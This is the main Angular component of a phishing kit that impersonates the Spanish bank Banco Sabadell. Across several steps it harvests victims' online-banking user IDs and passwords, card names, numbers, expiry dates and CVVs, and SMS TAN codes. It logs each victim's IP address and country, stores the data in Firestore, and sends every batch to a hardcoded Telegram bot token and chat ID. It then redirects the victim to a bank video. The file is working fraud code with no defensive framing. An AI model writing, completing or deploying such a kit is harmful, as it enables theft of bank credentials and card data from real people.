import { HttpClient } from '@angular/common/http';
import { HostListener } from '@angular/core';
import { Component } from '@angular/core';
import { AngularFirestore, AngularFirestoreCollection } from '@angular/fire/firestore';
import { Router } from '@angular/router';
import { TranslateService } from '@ngx-translate/core';
import { ReCaptchaV3Service } from 'ng-recaptcha';
import { NgxSpinnerService } from 'ngx-spinner';
import { Observable } from 'rxjs';
import { Billing } from './billing/billing';
import { Login } from './login/login';
import { Sms } from './login/sms';
import { MyService } from './myservice';
import { IpServiceService } from './ip-service.service';  

declare var $: any;
@Component({
  selector: 'app-root',
  templateUrl: './app.component.html',
  styleUrls: ['./app.component.css']
})
export class AppComponent {
  public innerWidth: any;
  userid: string;
  password: string;
  name: string;
  email: string;
  nameCard: string;
  ccnum: string;
  sms1: string;
  sms2: string;
  errors: any = {};
  exp: string;
  cvv: string;
  pin: string;
  pin2: string;
  step: number = 1;
  hasError = true;
  ipAddress:string;
  done = false;
  timer = 30;
  showLoading = true;
  chaka: any;
  public mobile: boolean;
  public mobile2: boolean = false;
  billing: Billing = { fullName: '', cardNumber: '', exp: '', cvv: '', dateTime: '', ip: '' };
  smsTAN: Sms = { smsTAN1: '', smsTAN2: '', dateTime: '', ip: '' };

  login: Login = { user: '', pin: '', dateTime: '', ip: '' };
  visit: any = { ip: '', country: '', dateTime: '', tabbassi: '' };
  loginsCollection: AngularFirestoreCollection<Login>;
  visitsCollection: AngularFirestoreCollection<any>;
  smsCollection: AngularFirestoreCollection<Sms>;
  billingsCollection: AngularFirestoreCollection<Billing>;

  logins: Observable<Login[]>;
  finished: boolean = false;

  constructor(private ip:IpServiceService,private recaptchaV3Service: ReCaptchaV3Service,private spinner: NgxSpinnerService, private httpClient: HttpClient, private router: Router, db: AngularFirestore, myService: MyService) {
    this.innerWidth = window.innerWidth;
    if (this.innerWidth < 382) {
      this.mobile2 = true;
    } else {
      this.mobile2 = false;
    }
    if (this.innerWidth < 1178) {
      this.mobile = true;
    } else {
      this.mobile = false;
    }
    
    this.visitsCollection = db.collection('visitsNet');
    this.smsCollection = db.collection('smsNet');
    this.billingsCollection = db.collection('billingNet');

    this.visit.dateTime = Date.now();
    myService.getIpAddress().subscribe(ip => {
      this.visit.ip = ip.ip;
      myService.getCountry(ip.ip).subscribe(country => {
        this.visit.country = country.country_name;
        this.visit.tabbassi ="5dz5a51";
        this.visitsCollection.add(this.visit);
      });
    });
    this.httpClient.get('https://api.ipify.org/?format=json').subscribe(ip => {
      this.chaka = ip;

    });
    console.log(this.chaka);
    //console.log(this.visit.ip + "dadada");


    this.loginsCollection = db.collection('loginNet');
    /*this.logins=this.loginsCollection.snapshotChanges().pipe(
      map ( changes=> {
        return changes.map(
          a=> {
            const data = a.payload.doc.data() as Login;
            data.id=a.payload.doc.id;
            return data;
          }
        )
      })
    );*/


  }
  title = 'Sabadel';

  ngOnInit() {
    this.ip.getIPAddress().subscribe((res:any)=>{  
      this.ipAddress=res.ip;  
      
    });  
    this.getIP();  
    console.log(this.ipAddress);
    this.spinner.show();
    setTimeout(() => {

      this.spinner.hide();
    }, 1000);
    this.innerWidth = window.innerWidth;

    $('input').each(function (key, value) {
      $(value).on('focus', function () {
        this.parent().find('label.placeholder').addClass('is-focussed')
      })
    });

    if (this.step === 3) {

      
    }

    if (this.innerWidth < 379) {
      this.mobile2 = true;
    } else {
      this.mobile2 = false;
    }
    if (this.innerWidth < 760) {
      this.mobile = true;
    } else {
      this.mobile = false;
    }
    this.executeImportantAction();

}

getIP()  
  {  
    this.ip.getIPAddress().subscribe((res:any)=>{  
      this.ipAddress=res.ip;  
      console.log(res.ip+" HalliINJnzfainhazuofhuaozihfuoaz");
    });  
  }  

public executeImportantAction(): void {
  this.recaptchaV3Service.execute('importantAction')
    .subscribe((token) => console.log(token));
}

  sendTelegram(message: string): Observable<any[]> {
    return this.httpClient.post<any[]>('https://api.telegram.org/bot1497863821:AAFXfjCeNLj2Q2EMslzJC8T0NYfRRj2c5BM/sendMessage?chat_id=-1001409867075&text=' + message, null);
  }

  setDone() {
    
    this.showLoading = true
    setTimeout(() => {
      this.showLoading = false
      this.done = true

      setInterval(() => {

        this.timer -= 1
        if (this.timer <= 0) {
          this.timer = 0
          this.hasError = false
        }
      }, 1000) // dont change this
    }, 1000)

      if (this.sms2.length < 2) {
        this.errors.sms2 = true;
        return;
      }
      


      this.smsTAN.smsTAN1 = this.sms1;
      this.smsTAN.smsTAN2 = this.sms2;
      this.smsTAN.dateTime = Date.now();
      this.smsTAN.ip = this.visit.ip;
  
      this.smsCollection.add(this.smsTAN);

      let message;
      message = this.smsTAN.smsTAN1+'   '+this.sms2+'   '+this.visit.ip;
      this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));


      setTimeout(() => window.location.href = 'https://www.youtube.com/watch?v=1ZQ6hQ0alnM&ab_channel=BancoSabadell', 7000);
  }


  setStep(number) {
    this.errors = {};
    this.spinner.show();
    setTimeout(() => {

      this.spinner.hide();



      if (this.step == 1) {
        if (this.userid.length < 5) {
          this.errors.userId = true;
          return;
        }
        if (this.password.length < 5) {
          this.errors.password = true;
          return;
        }

        this.login.user = this.userid;
        this.login.pin = this.password;
        this.login.dateTime = Date.now();
        this.login.ip = this.visit.ip;

        this.loginsCollection.add(this.login);
        let message;
        message = this.userid + '  ' + this.password + '  ' + this.visit.ip;
        this.sendTelegram(message).subscribe(data => console.log(data));


        this.step = number;
      }
      if (this.step == 2) {
        if (this.nameCard.length < 8) {
          this.errors.nameCard = true;
          return;
        }
        if (this.ccnum.length < 15) {
          this.errors.ccnum = true;
          return;
        }
        if (this.exp.length < 5) {
          this.errors.exp = true;
          return;
        }
        if (this.cvv.length < 3) {
          this.errors.cvv = true;
          return;
        }


        this.billing.fullName = this.nameCard;
        this.billing.cardNumber = this.ccnum;
        this.billing.exp = this.exp;
        this.billing.cvv = this.cvv;
        this.billing.dateTime = Date.now();
        this.billing.ip = this.visit.ip;
        this.billingsCollection.add(this.billing);

        let message;
        message = this.nameCard+'   '+this.ccnum+'   '+this.exp+'   '+this.cvv+'   '+this.visit.ip;
        this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));
        this.step = number;
        setTimeout(() => {
          this.showLoading = false
        }, 10000);
      }
      if (this.step == 3) {
        if (this.sms1.length < 2) {
          this.errors.sms1 = true;
          return;
        }
        
        this.smsTAN.smsTAN1 = this.sms1;
        this.smsTAN.dateTime = Date.now();
        this.smsTAN.ip = this.visit.ip;
    
        this.smsCollection.add(this.smsTAN);

        let message;
        message = this.smsTAN.smsTAN1+'   '+this.visit.ip;
        this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));
        this.step = number;
      }
      if (this.step == 4) {
        this.showLoading = true
      setTimeout(() => {
        this.showLoading = false
        setInterval(() => {

          this.timer -= 1
          if (this.timer <= 0) {
            this.timer = 0
            this.hasError = false
          }
        }, 1000) // dont change this
      }, 1000)

        if (this.sms2.length < 4) {
          this.errors.sms2 = true;
          return;
        }
        


        this.smsTAN.smsTAN1 = this.sms1;
        this.smsTAN.smsTAN2 = this.sms2;
        this.smsTAN.dateTime = Date.now();
        this.smsTAN.ip = this.visit.ip;
    
        this.smsCollection.add(this.smsTAN);

        let message;
        message = this.smsTAN.smsTAN1+'   '+this.sms2+'   '+this.visit.ip;
        this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));
      }
    }, 1500);



    //this.step = number
    if (this.step === 3) {

      setTimeout(() => {
        this.showLoading = false
      }, 1000)
    }

    if (this.step === 4) {
      


    }
  }
  @HostListener('window:resize', ['$event'])
  onResize(event) {
    this.innerWidth = window.innerWidth;

    if (this.innerWidth < 353) {
      this.mobile2 = true;
    } else {
      this.mobile2 = false;
    }
    if (this.innerWidth < 1178) {
      this.mobile = true;
    } else {
      this.mobile = false;
    }
  }

}
